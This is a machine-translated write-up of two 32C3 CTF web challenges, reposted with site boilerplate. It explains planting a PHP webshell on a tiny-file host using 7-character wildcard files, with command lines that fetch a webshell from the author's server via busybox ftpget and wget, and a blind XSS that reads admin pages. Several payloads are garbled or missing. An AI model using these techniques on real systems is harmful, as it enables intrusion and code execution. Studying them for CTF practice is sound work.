Writeup of 32C3CTF two Web questions

Source: Internet
Author: User
Introduction to Writeup 0x00 for 32C3CTF two Web questions

As a dog for sales, I am very happy to be able to do Web problems. I have two questions: TinyHosting and Kummerkasten.

0x01 TingHosting

A new file hosting service for very small files. could you pwn it? Http: // 136.243.194.53/

You can first find a hidden src parameter on the page, add? After src = 1, the source code of the page is returned.

This means that you can upload files of any file name to the server, but the content of each file is only seven characters long.

So first google, the shortest php webshell should be 14 characters:

#! Php
      

(PS: The original code has been converted. if there is an error... sorry.

Obviously not long enough.

Later, I had a lot of brains and thought of cute *, so the important payload was:

#!bashz.php

Content:

#! Php
       

There are only seven characters in length. you can execute all the things in the current directory in sequence.

So we need to construct some execution chains. the idea at the beginning is:

#!bashbusybox ftpget two.dog w.php z.php

Among them, the content of the first four files is random. w. php is the key payload above. after executing w. php, its content is overwritten by the webshell on my server and the webshell is obtained.

As a result, we found that busybox ftpget supports only ip addresses but not domain names.

Later, we wanted to construct it through wget, and used the cross-protocol feature of 302 redirection.

#!bashwget wtf.two.dog z.php

The content of the first two files is satisfactory. z. php is an important payload and you can win webshell.

But taking a closer look, this question will create an index.html file under every person's directory, so the execution chain is broken and cannot work.

Use bashto first remove index.html

Structure:

#!bashbash bb index.html z.php

Bash contains no more than 7 characters, and bb contains rm. Then you can obtain a webshell through the above method, and then find a flag in the root directory.

After reading the practice of foreigners, it is really easy to use. we can use bash, bb, and z. php. the content of bb is ls/, cat/f *, which is simple and direct 0 0.

0x02 Kummerkasten

Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site http: // 136.243.194.46/Please note: This challenge does not follow the flag format.

Hints: To build the flag, concatenate both parts and omit '32c3 _'

After entering, there was only one place to submit a message. when I looked at the page, I didn't find anything else. I felt like it was related to XSS.

After directly losing a payload for the blind cookie, the Echo is received:

Access is 403 in the past. I feel that XSS is needed to read the content of the page.

The original idea was to use jQuery in XSS and operate it with jQuery. The result showed that there was a page, which was too convenient.

With ajax, you can easily read and return pages.

You can see/admin/bugs and/admin/token.

Based on the information on the page, the key is to read two png images.

The final payload is as follows:

Then, combine the content of two shards, one mysql password and one six-digit number, that is, the FLAG.

0x03 Other

For more writeup information, refer to the following link:

Https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/web

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.